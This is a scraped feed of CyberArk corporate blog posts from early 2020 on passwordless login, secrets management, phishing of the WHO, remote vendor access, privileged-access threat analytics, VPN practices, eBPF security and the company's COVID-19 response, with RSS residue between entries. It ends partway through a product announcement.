NOTE: With Idaptive’s self-service enrollment and management of authenticators, you can self-enroll and manage push notifications, OATH tokens, security questions, security keys, FIDO authenticators, Windows Hello or MacOS TouchID, etc. So, if you forget your PIN, login with an equally strong or stronger security key. If lose your YubiKey, use a mobile push notification instead. Wide authenticator selection and simple self-service ensures that you will never be locked out, even in a Passwordless world!

Conclusion

So, the next time you discuss Passwordless with an identity vendor, do not hesitate to ask them about their idea of a true, holistic, and Passwordless solution — and what innovation and intellectual property have they invested in to make that a reality! And please let us know if they meet the “Idaptive” Passwordless standards.

For more information on Idaptive Passwordless capabilities please visit here.

]]>
Enable Developers with Self-Service Secrets Management https://www.cyberark.com/blog/enabling-developers-with-a-self-service-approach-to-secrets-management/ Tue, 07 Apr 2020 14:40:28 +0000 https://www.cyberark.com/?p=88757

With digital transformation pushing organizations to rapidly deploy new apps and services, too often, development teams can be so focused on getting the next set of features out to customers that security becomes an afterthought. So, with the widespread adoption of DevOps methodologies, how do security teams engage with developers?

One approach security teams are taking is to establish strong, effective partnerships with developers and DevOps teams, but, as with digital transformation, establishing such a partnership is a journey with multiple steps and initiatives. For example, security teams can provide developers with security solutions that make it easier for them to do the right thing. In many cases, this means providing developers with easily consumable security capabilities that can be incorporated into their automated processes.

Some security capabilities are more easily consumable than others. For example, code scanning tools can be added relatively easily to the build processes, preventing code with known viruses or other issues from being incorporated into the build. Some security testing can be automated, so that the build automatically rejects artifacts that fail. These security checks can simply be incorporated as part of the CI/CD process and, except for when a problem is detected, they’ll have minimal impact on the individual developers writing their code.

The area of secrets management is a little more challenging and possibly disruptive, as it potentially impacts each developer when they code or update apps to access databases and other sensitive resources. In this case, the developer needs to ensure each app securely accesses the resource using privileged credentials.

So, typically at run time, the app needs to be able to authenticate to the digital vault and fetch the privileged credential necessary to access the resource. A newly written application, for example, will need to be coded to get the credentials from the secrets management solution, which will need to know to authenticate to the application.

One approach we’ve seen security teams adopt is to provide developers with a self-service solution, so developers can more easily give the apps they are writing secure access to databases and other resources.

Why Self-Service Solutions for Secrets Management?

It might seem simpler to have security work directly with the developers and update the secrets management solution themselves, making sure that each newly created app can use the secrets management solution to get the credentials it needs. While this can work in a small team, an enterprise will have too many apps and likely many more developers writing and updating apps than a security team can handle manually. In that case, self-service becomes a necessity.

One enterprise customer in the retail space needed to rapidly and cost-effectively deploy new customer applications to compete with online retailers. The security team wanted to ensure applications securely accessed databases by deploying a secrets management solution that would be able to secure the core application functions used by the business (such as, inventory, procurement, stores and in store pickup) – which consisted of thousands of Pivotal microservices.

Their developers were great at writing apps; however, with over a thousand developers and only a small security team, security was concerned that they would get overwhelmed and become a roadblock, negatively impacting the deployment of apps. So, the retailer implemented a self-service solution.

They used a Jenkins CI/CD pipeline to automatically update the secrets manager’s policies. Then, with the updated policies in place, the secrets manager only allowed approved apps to securely access databases. Once it was set up, the solution could handle developers’ requests to approve apps to securely access databases and only route exceptions to the security team.

In another example, the security team at a financial services customer with a large number of applications running on Red Hat OpenShift, wanted the developers and application teams to have their applications request secrets based on policy. However, security did not want to force the development teams to write security policies. So, this company opted for a self-service solution to automate the approval process, and now when the developer’s request is approved, the security policy is automatically updated.

Typically, credentials are managed centrally by the CyberArk Privileged Access Security Solution and provided to the applications by The CyberArk Application Access Manager’s Dynamic Access Provider and either CyberArk’s certified Red Hat OpenShift, Pivotal Tile integration or as Kubernetes Secrets.

Why Self-Service Approaches Matter

Developers don’t want to work with any solution that takes up unnecessary time – meaning that a secrets management solution won’t be adopted if they’re going to be dependent on security to update the access policies or if they’re forced to write the policies themselves.

If not done correctly, organizations can experience significant developer pushback, poor adoption and either delays in app deployment or deploy apps that don’t securely access resources. The self-service approach avoids all of this by facilitating developer productivity rather than inhibiting it, becoming a win-win for developers and for security.

Self-service approaches to secrets management not only help security teams build a partnership with developers, but also enables organizations to more rapidly and efficiently ensure the security of their applications. Given these benefits, as enterprises – especially those with large portfolios – make their digital transformational journey, they will likely increasingly turn to self-service approaches that provide developers with an automated way to give applications secure access to sensitive resources.

Discover more strategies for aligning DevOps and security teams and learn about the CyberArk Application Access Manager secrets management solution for enterprises and CyberArk’s open source secrets management solution, Conjur Open Source.

]]>
What the WHO Attack Teaches Us About Redefining Risk https://www.cyberark.com/blog/what-the-who-attack-teaches-us-about-redefining-risk/ Tue, 31 Mar 2020 13:00:03 +0000 https://www.cyberark.com/?p=88137

As governments, organizations and individuals around the world grapple with unprecedented and rapidly evolving circumstances, opportunistic cyber attackers are making moves.

According to Reuters, a group of attackers launched a phishing campaign earlier this month targeting the World Health Organization (WHO). Experts believe the attack was orchestrated by a sophisticated nation-state group with the goal of harvesting credentials used by WHO employees to access critical systems and applications.

Alexander Urbelis, the cybersecurity researcher who first sounded the alarm, explained to InfoRiskToday that the attackers utilized sub-domains in an attempt to compromise WHO’s Active Directory Federated Service, a single sign-on service. He was able to identify from the structure of the URL that the attack targeted the WHO log-in portal and to identify that this was a brand new targeting of the WHO.

While unsuccessful, the attack is one in a string of recent cyber attacks on the agency. WHO Chief Information Security Officer Flavio Aggio told Reuters that the number of attempts to compromise the WHO or impersonate it in order to target others have “more than doubled.”

 A New Category of Institutions Under Attack

This surge in attacker activity is impacting public and private organizations alike, particularly those focused on healthcare, medical research and current relief work. For example, cybercriminals posing as the U.S. Centers for Disease Control and Prevention (CDC) sent out phishing emails offering information on the COVID-19, reports Bloomberg.

Additionally, the U.K.’s National Crime Agency is investigating an alleged ransomware attack against a drug testing company that develops vaccines, according to The Wall Street Journal. Meanwhile, as attacks against organizations mount, millions of U.S. citizens seeking financial assistance from the new $2 trillion government relief package are ripe targets for stimulus scams, warns the FBI.

This wave of new attacks is particularly concerning as it focuses on a new set of institutions that have not previously been targeted at this scale and with such force. Compounding the issue, most of these organizations are simultaneously facing the gargantuan challenge of supporting and securing a newly remote workforce.

The Hidden, Persistent Problem and Breaking the Cyber Attack Chain

Though some reports of attacks have emerged, many organizations may not yet know that they’ve been targeted and compromised.

Crisis situations can create a vacuum of information that attackers exploit to launch new attacks. They abuse the crisis in hopes that the broader issues will provide a distraction that minimizes the typical appropriate response. And, while organizations have collectively gotten better and faster at discovering breaches over the years, the global median dwell time before any detection – external or internal – is still 78 days.  Unfortunately, 78 days is ample time for attackers to find, access and steal sensitive data and information.

As with the attempted WHO attack, most attackers seek to gain a foothold by stealing credentials as a first step in the cyber attack chain. They often use these credentials to compromise an endpoint such as a desktop, laptop, mobile device or server. From there, they conduct reconnaissance, then begin moving laterally in search of the privileged credentials needed to get into specific systems. Since they’ve acquired legitimate credentials, it’s easy for attackers to move through the network undetected, escalating privileges in search of their target.

To identify the threat, the organization must have a strong handle on what legitimate communications and authentication look like – or the attacker can easily slip under the radar. Then they patiently wait, sometimes completely dormant, while the organization focuses its attention elsewhere. Some attackers exfiltrate sensitive information little by little, while others wait for the perfect moment to deliver a devastating blow. Attackers can wait for as long as they need, so the actual blow may not come until after the current crisis eases.

As this current situation unfolds, we can expect more attacks of this nature on critical infrastructure and assets. Organizations – particularly government agencies, private companies and healthcare providers – need to be hyper-vigilant and redefine how they’re assessing risk in this new normal. Employee education on phishing and other popular endpoint attack methods is critical to prevent attacks from taking hold. But it cannot end there.

Contrary to popular belief, the greatest risk organizations currently face is containing attackers before they can affect or access critical data and assets – not stopping initial attacker infiltration, which is impossible to prevent 100 percent of the time. Managing access to privileged accounts and credentials is an effective way to break the cyber kill chain, minimize the moves a threat actor can make after infiltrating an organization, and ultimately, prevent a data breach or disruption.

To learn more, read “5 Reasons to Prioritize Privileged Access Management (PAM)” or explore our free collection of cybersecurity resources.

 

]]>
5 Types of Remote Users You Need to Take into Account https://www.cyberark.com/blog/5-types-of-remote-users-you-need-to-take-into-account/ Thu, 26 Mar 2020 13:00:18 +0000 https://www.cyberark.com/?p=88000

The physical location of users matters less and less in how we conduct business in the new normal. Even before COVID-19 changed the way business is done, a 2019 study showed that 62% of people surveyed worked from home at least part of the time. In the same study, 82% of those who worked remotely at least part of the time reported that they planned to either maintain or increase their level of remote work. Further, more than half (51%) of those who did not do any remote work wanted to start. These numbers have surely only gone way up.

One additional thing to keep in mind is that these figures don’t even take into account the number of remote vendors who function like employees by performing essential tasks for the company.  These users often need access to critical systems the same way an employee does. Of course, with greater flexibility for workers comes greater security risks. In order to provision access, organizations often rely on insecure and inefficient methods, typically relying on VPNs to provide secure access.

However, not all remote workers’ privileges are created equal.  Some may require access to just email and a smattering of business applications, while others may need access to critical business applications like payroll, HR and sales and marketing data. External IT service providers performing outsourced help desk support require the same broad access as internal IT providers.

Today, we’ll identify the top five types of remote workers who often require elevated privileges to systems and discuss how privileged access management (PAM) can help organizations provide secure and easy access to critical systems.

1. Remote IT or Security Company Employees

These users include people like domain admins, network admins and others who typically access critical internal systems from inside the office, but are now working from home as the default. When IT or security work from outside the office walls, it throws a wrench into security administrators day-to-day.

Identifying the precise levels of access needed by remote IT and security employees and implementing least privilege rights to ensure that they’re only accessing what they need is critical.  Traditional solutions like VPNs  can’t provide the necessary level of granular, application-level access to do this effectively. Assigning this kind of granular access is important as it helps prevent situations like a Windows admin having access to root accounts.

Integrating security tools with the directory service to provide automated, specific access needs to be set up ahead of time so that, in the event of an unplanned spike in remote work, there’s no gap in IT or security functions while secure conditions for working from home are established.

2. Third-Party Hardware and Software Vendors

Third party vendors for hardware and software, including IT Service providers and contracted Help Desk support, often provide remote services and maintenance that require elevated privileges. These types of vendors would typically require admin-level access to perform tasks on any variety of Windows or Linux servers or databases and are called on to perform patching, system updates and more.

They each essentially act as domain level administrators and, thus, can wreak havoc on the environment if not properly monitored and provisioned properly. However, identifying these users and accounting their individual levels of remote vendor access is usually done on a case-by-case basis by administrators which can take an abundance of time.  It’s important to make sure that all of these users are identified and have the correct access provisioned.

3. Supply Chain Vendors

When supporting the production or delivery of goods isn’t the bread and butter of an organization, it’s common to bring in specialized supply chain vendors to help. These remote users often have access to the network in order to monitor inventory in retail or manufacturing organizations. They may also have access to sensitive data related to forecasted output, quality control and other critical systems that could be related to Industrial Control Systems and Operational Technology (ICS/OT) or on-site supply chain processes.

These vendors may not be the first to come to mind because they’re not qualified as administrators, but supply chain vendors have access that could be leveraged in a dangerous way by malicious attackers or become a serious problem due to inadvertent internal misuse.

4. Services Companies

Service companies that perform departmental tasks like legal, PR and payroll may require access to specific business applications in order to be efficient. It’s important to identify these types of users and enforce the principle of least privilege to make sure they don’t gain access to anything outside of their purview or retain access longer than they need it. It wouldn’t make much practical sense to have a legal service company have access to payroll information; all it would do is increase potential risk.

Business critical applications like Customer Relationship Management (CRM), Enterprise Resource Planning (ERP), cloud consoles and more are important for business continuity and operations, but in the wrong hands the data that lives in these applications can be very dangerous. Identifying who has access to these applications is very important and minimizing the ability to move laterally from one business application to the next can be the difference between a major data breach and business as usual.

5. External Consultants

Business and IT consultants will sometimes need privileged access in order to be productive on the projects that they’re contracted to do, but they should only have that access during the time period they’re contracted for. These types of vendors are temporary by nature and often will only require access for days, weeks or months at a time as they perform their duties. However, within that time frame, external consultants will often receive sweeping access to certain areas of the business.

Identifying early on who these consultants are and what type of access they require (and to what and for how long) – helps reduce risk and safeguard the business.  In addition, an external consultant’s access should be closely monitored and secured while active and their access should be automatically deprovisioned as soon as they’re time working for the company concludes.

Imagine this. A consultant is brought on for a three-week project, gets poor feedback and feels slighted in how they are compensated.  If they aren’t deprovisioned automatically, it’s possible they could maintain elevated levels of access past the end of their contract and use it to cause irreparable harm to the organization as payback. While this may seem like an unlikely scenario, it’s just one example of the harm elevated access can cause if not monitored and updated regularly.

As more and more companies rely on remote users as a necessity for day-to-day business plans, it’s important that they understand the various types of users that are logging into their systems outside of their offices. And more importantly are managing, monitoring and securing that access.

While it can feel like an overwhelming task, CyberArk Alero is a SaaS offering that helps organizations provide and provision secure access to remote users accessing critical systems managed by CyberArk. It can be easily deployed across any number of remote users without the need for VPNs, agents or passwords.

]]>
Know Thy Enemy: Threat Analytics Boosts PAM Effectiveness https://www.cyberark.com/blog/know-thy-enemy-threat-analytics-boosts-pam-effectiveness/ Tue, 24 Mar 2020 13:57:20 +0000 https://www.cyberark.com/?p=87934 Threat Analytics

“Every battle is won before it is fought”
― Sun Tzu, The Art of War

The Art of War, Chinese Philosopher Sun Tzu’s treatise on military strategy, is one of the most influential texts in modern history, influencing strategic decision-making from military command centers, corporate boardrooms and the locker rooms of iconic sports teams. The book is less about the x’s-and-o’s of individual battles than about the discipline of preparation. “If ignorant both of your enemy and yourself, you are certain to be in peril,” Sun Tzu teaches.

This advice serves as an essential reminder in today’s cybersecurity landscape – preparedness and self-awareness are as crucial to cybersecurity as they are to battle. To account for increasingly sophisticated cyber threats, businesses must pivot away from a reactive, compliance-driven mindset towards a more proactive security-first approach. To avoid the dangers of ignorance, businesses need a constant stream of data and intelligence across their security operations, as they can only prepare for the threats that they understand.

Threat analytics tools that analyze security risks associated with privileged access are powerful weapons for strategic Privileged Access Management (PAM) programs. They are also key to applying Sun Tzu’s advice to modern day cybersecurity and becoming more aware of both enemy cyber attackers and the dangers of unmanaged privileged accounts that could put your organization at risk.

Security teams with a PAM program or those that are looking to implement one should leverage PAM providers’ threat analytics capabilities and look also at the analytics capabilities already in use by their Security and Operations teams.

Since most cyber attacks follow the progression of gaining an initial foothold on the network and then moving laterally to escalate privileges, threat analytics tools provide vital risk reduction capabilities and the foundation for an effective PAM program.

Here’s how threat analytics can help organizations improve their security posture and operational efficiency by better understanding themselves and their enemies.

Keep Unsecured Privileged Accounts Off the Battlefield

The Art of War has an entire chapter dedicated to the importance of understanding the “terrain” on which a battle takes place. In alignment with that concept, well-run PAM programs leverage threat analytics to continuously scan and discover unmanaged privileged accounts both on-premises and in the cloud.

A good place to start is with unmanaged Linux, Unix and Windows accounts. Getting unmanaged accounts under control presents a quick win in terms of quantifiable risk reduction.  After unmanaged accounts have been discovered, PAM solution can automatically onboard these accounts, eliminating time consuming and error-prone processes.

Gather Intelligence and Shut Down Attacks in Real-Time

Once unmanaged privileged accounts have been identified, threat analytics capabilities provide consistent controls against risky behavior associated with common attack vectors in SaaS, on-premise and IaaS environments. Threat analytics provide vital context on anomalous activity and privileged behavior that help organizations follow Sun Tzu’s advice to “know the enemy and know yourself.”

Even when organizations manage and protect credentials for their hybrid cloud environments, there is still the potential that these credentials could be left exposed in public code repositories or on end user’s systems. Malicious attackers could find these keys and use them to cause harm – like causing business disruption.

Consider that threat analytics in PAM solutions can detect when privileged AWS access keys have been used without having been retrieved from the PAM solution. Recognizing this indicator of potential compromise, the PAM solution can automatically rotate credentials and alert security teams, providing them additional response time. The same capabilities can help defend against credential theft and other attack vectors in on-premises environments as well.

By analyzing data on the usage of privilege accounts through machine learning and artificial intelligence, threat analytics can establish baseline usage patterns in order to detect behavioral anomalies that could signal in-progress attacks.  Examples include:

  • Behavior that violates user permissions, such as an employee bypassing the PAM solution to reset a password
  • Unauthorized attempts to escalate privileges, including an admin granting himself unnecessary privileges
  • Irregular behavior for a non-human identity, like an interactive log-in for a service account
  • Irregular behavior for a human identity, such as a user retrieving an unusual volume of passwords from a credential vault
  • Dormant users suddenly becoming active, for example, an inactive employee user accounts re-surfacing to access sensitive data
  • Irregular machine usage, like servers signaling heavy workloads during non-work periods

By detecting these and other anomalies, security teams can rapidly investigate or even automatically respond to and shut down potential attacks, helping them heed Sun Tzu’s advice to “fall like a thunderbolt.”

Integrate Privileged Threat Analytics with Other Security Tools

Integrating PAM solutions with other solutions such as Security Information Event Management (SIEM) tools, which log and analyze data to monitor security events, can augment the value of both solutions. By focusing on the most sensitive infrastructure in an organization and the most high-risk activity, PAM solutions can identify risks that traditional SIEM tools may not.

Sharing information bi-directionally between PAM and SIEM solutions can eliminate information silos and unify threat intelligence across the enterprise. This provides SOC teams the ability to strike quickly and rapidly respond to security events.

Sun Tzu said “Know yourself and you will win all battles.”  Threat analytics can help organizations prepare for ongoing battle in the constantly evolving threat landscape by helping to ensure that all privileged accounts are fully managed, monitored and controlled in order to understand the behavior of their adversaries and remediate threats in real-time.

Curious about how threat analytics fits into an effective PAM strategy? Watch this webinar to learn more.

]]>
Five Simple Rules for Implementing VPN for the Remote Workforce https://www.cyberark.com/blog/five-simple-rules-for-implementing-vpn-for-the-remote-workforce/ Mon, 23 Mar 2020 15:46:30 +0000 https://www.cyberark.com/?p=99189

For many employees, the morning work routine looks a lot different than it used to. Instead of heading to the office, they make their coffee, “commute” to their home workspace and connect to a Virtual Private Network (VPN) to access corporate resources and applications.

The VPN is one of the most time-tested, albeit a bit risky, solution out there for secure remote access. I call it risky because, if not properly implemented and maintained, attackers might be able to exploit weaknesses to gain privileged access to sensitive systems and data. In fact, some organizations are opting for new ways to connect their remote workforces that eliminate the need for VPNs or agents and help streamline operations and user workflows.

For organizations using VPNs, it’s important that the VPN stack is properly patched, using the right encryption, and continuously monitoring traffic patterns and usage. Even more important is working to ensure that users logging on to the VPN are verified to a high degree of assurance, the devices are validated and related privileges and entitlements are in line with the principle of least privilege…isn’t this sounding like the founding principles of Zero Trust security?

image 1

Let’s examine five best practices for implementing VPN in the context of these three pillars of Zero Trust security.

Rule # 1: Verifying Users: Make sure the VPN solution supports Multi-factor Authentication (MFA) through RADIUS and/or SAML.

Most VPN solutions support different types of authentication mechanisms, depending on the type of VPN (site-to-site, remote user). One type that supports MFA is the use of RADIUS, in which the VPN server becomes a RADIUS client to a RADIUS server, which in turn is able to perform a Multi-factor Authentication. For example, CyberArk Idaptive connector software can serve as a RADIUS server as well as an AD proxy to perform the AD authentication as well as present a second factor in the form of a mobile authenticator, OATH OTP, email, for the second factor.

The following figure shows the various steps involved in the RADIUS-based authentication between the RADIUS client and CyberArk Idaptive Connector, which serves as the RADIUS server (among other things).

image 3

Another way to integrate a VPN with an external IDP for authentication is through SAML. This is not supported by all the VPN vendors out there, but if supported, then there is no need to install a desktop VPN client on the endpoints. Below is an illustration on how this works with Palo Alto Network’s Global Protect solution.

image 4

So, as you are looking for a VPN solution ask yourself the questions:

  1. Does it support MFA?
  2. Does the solution require a VPN client to be installed on the endpoints? If so, which authentication mechanisms is it able to support? For example, some mechanisms are pushed directly to the authentication provider (AP) for verification from the mechanism, and some require the end-user to interact with the VPN client to enter a code (e.g. OATH OTP code), which is then sent to the AP for verification.
  3. Does the solution support a client-less VPN authentication mechanism such as SAML? This is especially convenient since then the IT administrator does not have to ensure that each client is installed with the right version of the client and thus is able to embrace a wider range of endpoints in a secure fashion. Some clients (Cisco’s Anyconnect is an example) do have support for embedded browsers, which can then support SAML.

Rule # 2: Limiting Access: Make sure the RADIUS server is able work with specific attributes to limit access and authorization.

The vendor-specific attributes are necessary if you want to give users permission for more than one type of access. For example, based on the user role, the user may be granted a particular privilege level, thereby limiting access. The VSAs may be used in combination with RADIUS-defined attributes. For example, this link shows Ciscos’s VSAs.

Rule # 3: Verifying Users: The authentication provider (CyberArk Idaptive in our case) solution is able to support a heterogenous VPN environment.

Many a time an organization may have multiple VPN vendors with a mix of protocol support for authentication and access control. The RADIUS server/IDP must be able to support different authentication profiles, for instance, for the different VPN servers (RADIUS clients). For example, if more sensitive types of resources are accessed from one VPN server then an authentication profile with stronger authentication can be applied vs. that for a different VPN server fronting less critical resources.

Rule # 4Intelligently Limit Access: IDP solution is able to offer an adaptive, risk aware, solution.

Even for a single VPN server, the authentication provider must be able to provide a way to detect user behavioral anomalies and present different challenges based on the user’s risk. This is especially critical in the current scenario where most, if not all, workers are going to be remote for the foreseeable future.

Rule #5Validating Device: The endpoint itself is protected by MFA and Conditional Access.

With users being remote, and possibly also using their own devices (BYOD), it is important to only grant access to those devices with users who were verified by MFA as part of logging into the device itself.

image 5

For more information on securing your remote workforce, visit our Risk Distancing Resource Center.

]]>
CyberArk Provides Free Subscription to Alero https://www.cyberark.com/blog/cyberark-provides-free-subscription-to-alero/ Wed, 18 Mar 2020 12:30:48 +0000 https://www.cyberark.com/?p=87716

As organizations move quickly to do their part in stopping the spread of COVID-19 people are working remotely more than ever before.  At CyberArk we have taken action to protect the health and safety of our global community of customers, partners and employees – including having our employees across the globe work from home.

It’s not always easy for organizations to move to full remote work, especially having to balance productivity and security. Sudden, unexpected changes in the amount of work being done from home affects the workflows of remote users – especially those requiring privileged access – and most of the time, organizations don’t have the ability to properly scale. Additionally, attackers are working to capitalize on people’s fears and desire for information, which underscores the need to safeguard critical systems and assets.

Utilizing technology to overcome these challenges can help make these trying times a bit easier. Whether that’s making greater use of video chat and conference calling or allowing secure access to internal systems from anywhere, technology is helping business to continue with as little disruption as possible.

Recently we launched a new use case for CyberArk Alero to address the needs of all remote users (employees and vendors) by providing secure remote access to critical systems managed by CyberArk.

Starting today, we’ll be offering qualified customers the use of CyberArk Alero at no cost through the end of May in hopes that it will help ease some of the burden associated with the changing work environment.  There are many ways that we, as individuals and as a company, are working to help our communities during this trying time.  As business continuity plans are being tested, we hope to help organizations keep business running securely while putting the health and safety of all of us first.

For more information or question – please get in touch with us here.

]]>
A Message from Our CEO: Working Together in Unprecedented Times https://www.cyberark.com/blog/a-message-from-our-ceo-working-together-in-unprecedented-times/ Tue, 17 Mar 2020 16:28:01 +0000 https://www.cyberark.com/?p=87703

The CyberArk Response to COVID-19

We are living in an unprecedented time as the world quickly adjusts to the rapidly changing dynamics created by COVID-19. During this challenging time, at CyberArk we believe it is more important than ever that we demonstrate our core values, including “Customer First” and “We.”  As a result, we have taken action to protect the health and safety of our global community of customers, partners and employees.

We formed an executive level task force to respond to the COVID-19 situation and are closely monitoring guidance from the World Health Organization (WHO), the CDC (Centers for Disease Control), as well as local authorities to help shape our policies and guidance.

All CyberArk employees, including service and support team members, are fully enabled to work securely from home so that they can support the business continuity strategies of our customers and partners as they change business workflows in their response to COVID-19. Our support team is available to customers 24 hours a day, seven days a week. More information can be found on our technical support page.

We’ve restricted all non-essential business travel for our employees, and established a dedicated CyberArk intranet page to provide employees with up to date guidance and answers to commonly asked questions.

To help our customers protect against emerging threats, the CyberArk Labs team is actively researching how attackers are capitalizing on COVID-19 and we are communicating findings to customers and partners. We have also made CyberArk Alero available through May at no cost to eligible CyberArk customers. Alero can help support our customers’ business by enabling remote employees simple and secure access to critical systems managed by CyberArk.

As our top priority remains the health and safety of all CyberArk event attendees, we have decided to cancel Impact Dallas 2020 in May and instead deliver a virtual event experience (details to be determined).

We will continue to actively monitor the situation globally and if CyberArk becomes aware of any change in the situation that would impact the support, services or products available to CyberArk customers, we will notify impacted customers as soon as practicable.

This is unchartered territory, but we have navigated many economic and geopolitical challenges together as a community. I want to thank our employees for their dedication, flexibility and commitment to uninterrupted customer service. We are committed to doing all that we can to support the safety and well-being of our customers, partners and employees.

 

Udi Mokady

Founder, Chairman & CEO

 

]]>
Security with Extended Berkeley Packet Filter and PAM https://www.cyberark.com/blog/security-with-extended-berkeley-packet-filter-and-pam/ Thu, 12 Mar 2020 13:39:03 +0000 https://www.cyberark.com/?p=87469 eBPF and Privileged Access Management (PAM)

Extended Berkeley Packet Filter (ePBF) has been circulating the developer arena for quite some time.  The original BPF was developed nearly three decades ago by US national laboratory research scientists as an architecture for Unix operating systems designed to monitor packet filtering on the host.

Companies like Amazon, Google, Facebook and Netflix are leveraging the Linux kernel extension (eBPF) for various network security and monitoring processes. Why? In short, because it’s super easy to implement and it provides a more secure and restricted environment for the development team.

This technology allows for monitoring within the kernel – you can run user-defined code at the kernel level, safely and without ever having to go deep down the stack and write a kernel module.  It’s a tiny virtual machine that exists inside Linux, supporting various monitoring functions within the kernel. The fact that developers are leveraging this is a great thing from a security perspective.  It’s like the dev team writing an open letter:

Dear Security, Ops and the Business, we care about writing secure and attestable code, we just need your backing and tools that enable it.

One common use case example of this is tcpdump, which displays the packets (TCP/IP) that are traversing through the network of that given Linux instance.  Executing tcpdump requires root or “sudo” access, primarily due to the Linux capabilities involved as part of this process.  However, the sudo command can provide a false sense of security.  In theory, sudo is designed to improve the security around root access, but, in reality, there are many drawbacks to sudo that bring its security capabilities into question.

In many organizations, the individual who requires root access is the same person who configures sudo policies, so there is no separation of duties.  Even if separation of duties is in place, the sudoers file is still stored locally, which presents a significant security risk.  Users can easily escalate to root to access the sudoers file and change policies to grant additional permissions, delete logs to cover their tracks and cause significant damage to the business.  The end result: no integrity to the data that sudo is collecting.

eBPF in Containerized Environments

Nowadays the use of LXC (Linux Containers) is essentially universal.  By simple definition, LXC are abstractions of physical hardware within the Linux kernel.  Leveraging Linux kernel structures such as namespaces and control groups (cgroups), Docker and other container runtimes allows you to achieve isolation and abstraction – similar to what you get with virtual machines.  This logical isolation layer is a good thing for application delivery.

If you’re reading this blog, chances are you understand that containers are ephemeral in nature.  They can be deployed and decommissioned in hours or even minutes, which makes both management and security quite challenging.

The fact that all LXC running on the same physical hardware share a single kernel makes the use of eBPF for monitoring and securing applications an extremely useful approach to securing containerized environments.  Installing a secure computing mode (seccomp) filter for eBPF is a best practice that folds in the principle of least privilege to minimize what’s exposed at the kernel level, limiting what system calls can be made.

CyberArk understands the importance of ensuring that consistent security policies are enforced, which is why we enable our customers to customize their seccomp files to fit their security preferences, allowing them to import these settings directly into containers themselves via Docker Compose (see Figure 1).  Doing this prevents any pre-defined security policies from being changed, which in turn mitigates the risk of a larger-scale attack by limiting an attacker’s ability to make system calls from the container layer.

Figure 1. This is a demonstration of a project which allows CyberArk users to customize their seccomp.

Technology like eBPF is a great impetus for stability, visibility and security and having a defense in depth approach is a requirement for proactive protection against advanced attacks.  Developers who use eBPF benefit from performance monitoring and load balancing as well as network traffic information and the laundry list of application-specific data that’s generated.

Security teams benefit from basic user-level actions performed within the shell, which is provided out-of-the-box, and can get even greater security by leveraging CyberArk Core Privileged Access Security for more granular controls in both Unix and Linux systems.

Using eBPF for system monitoring provides great visibility and minimizes the need for remote privileged access, but if that access is required, it should be managed and controlled.  Combining the use of eBPF with CyberArk privilege access management (PAM) solutions provides deep privileged user control and accountability across all of Unix/Linux instances both in the cloud or on-premises.  Contact us to see a technical demonstration of how the CyberArk solution can help enable your business.

]]>
Gold Standard Cybersecurity for the Gig Economy https://www.cyberark.com/blog/gold-standard-cyber-security-for-the-gig-economy/ Tue, 10 Mar 2020 15:22:14 +0000 https://www.cyberark.com/?p=87235 Securing Remote Vendor Access

Gold Standard Cyber Security for the Gig Economy

The ‘gig’ economy is said to be many things – but one thing that isn’t talked about enough is the potential cyber attack vectors it can open up. Instead, news articles and Op-eds variously depict it as symptomatic of the decline in the traditional nine-to-five day (characterised by a stable income and healthcare) or the jet fuel powering the new world economy.

Whatever your views on its positives (or negatives), the increasing trend among companies of hiring independent contractors and freelancers instead of full-time employees, the gig economy is big and getting bigger: now accounting for more than 57 million workers in the US alone. With the gig economy now a fixture of the corporate landscape – isn’t it time to make sure it isn’t exposing you to new risks?

If asked to describe the typical gig economy worker, most people would probably cite a part-time Uber or Deliveroo driver – but that’s doesn’t explain those massive numbers. Even traditional retail and corporate powerhouses now comprise a mix of full-time, part-time and short-term workers to ensure they can remain nimble, cost-effective and able to adapt to changing market conditions in a fast-paced, technology-led environment.

However, there’s another surprising profession that has become a major part of the gig economy – IT. Since IT professionals – from systems administrators to developers and engineers – often need extensive access to their employer’s systems, this can very quickly become a problem for security, especially if that access is privileged.

Of course, companies have good reasons for turning IT jobs into gig work. It is in line with how modern enterprises approach IT in general. Think about how cloud services work. The same way cloud services allow companies to deploy more resources when they’re needed and fewer when they’re not, the gig economy lets companies only field the number of IT professionals they need as their needs change. It’s quick; it’s flexible and it meets the evolving needs of the business.

One thing that participating in the gig economy is not, however, is inherently secure. The old model for cybersecurity was built around a controlled environment, such as the corporate network.  The network perimeter – traditionally the first line of defense – was a known quantity and yes, it had holes, but the location of the weak spots was probably already known. Now, the perimeter is at best distributed and at worst non-existent.

Meanwhile, IT professionals perform some of the more crucial and highly privileged roles in 21st century organizations, because every business relies on information and technology in order to function. It’s assumed that large quantities of critical data and at least a few critical assets will need to be accessed and managed in order for the business to serve customers, meet manufacturing deadlines and more.

It’s common for in-house IT employees to be subject to strict security oversight. However, when these roles are performed by remote third parties, short-term contractors or otherwise not by permanent, trusted staff based in the office, security must adapt to the new threats this poses.

As flexible workers plug into an organization’s network and access sensitive company systems from outside the physical perimeter of the office, organizations need to have strict security protocols in place to properly mitigate the elevated risk that this entails.

They also need to enforce proper controls so remote gig workers are only accessing what they need to, instead of trusting them with sweeping access to everything. Risk factors include accessing networks from personal devices that lack enterprise-grade security or from home networks that could be easily compromised.

According to CyberArk global threat research, 90 percent of organizations allow remote vendor access to their critical systems and 72 percent put remote vendor access in their top 10 security risks. So, this problem is widespread and the risk is understood.  But, is it acted upon? If not, gig economy workers put themselves and their employers at risk of data breaches, leaks of confidential information and more.

Advances in technology mean the shortcomings of existing options – like VPNs – to secure remote workers can now be overcome. Use of biometrics, Zero Trust principles and just-in-time provisioning can and should be employed to reliably authenticate remote vendor access to the most sensitive parts of the corporate network. In the gig economy, where endpoint devices have disparate levels of security and the office environment can be a café, car or home office, cybersecurity needs to match the flexibility of modern working. And it needs to be recognized and implemented.

CyberArk Alero provides secure authentication with the flexibility and ease-of-use that modern remote workers need by using the remote workers’ own mobile devices for biometric and multifactor authentication. Learn more about how Alero secures secures remote access or download the Alero datasheet.

]]>
Boldly Go Farther with Greater Efficiency for PAM https://www.cyberark.com/blog/boldly-go-farther-with-greater-efficiency-for-pam/ Thu, 05 Mar 2020 15:05:35 +0000 https://www.cyberark.com/?p=86990 Privileged Access Management (PAM)

CyberArk today announced version 11.3 of its flagship solution for enterprises – the CyberArk Privileged Access Security Solution. Speaking of flagships and enterprises, it turns out that it’s possible to learn a lot about privileged access management (PAM) and the new CyberArk solution from another famous flagship, the Starship Enterprise.

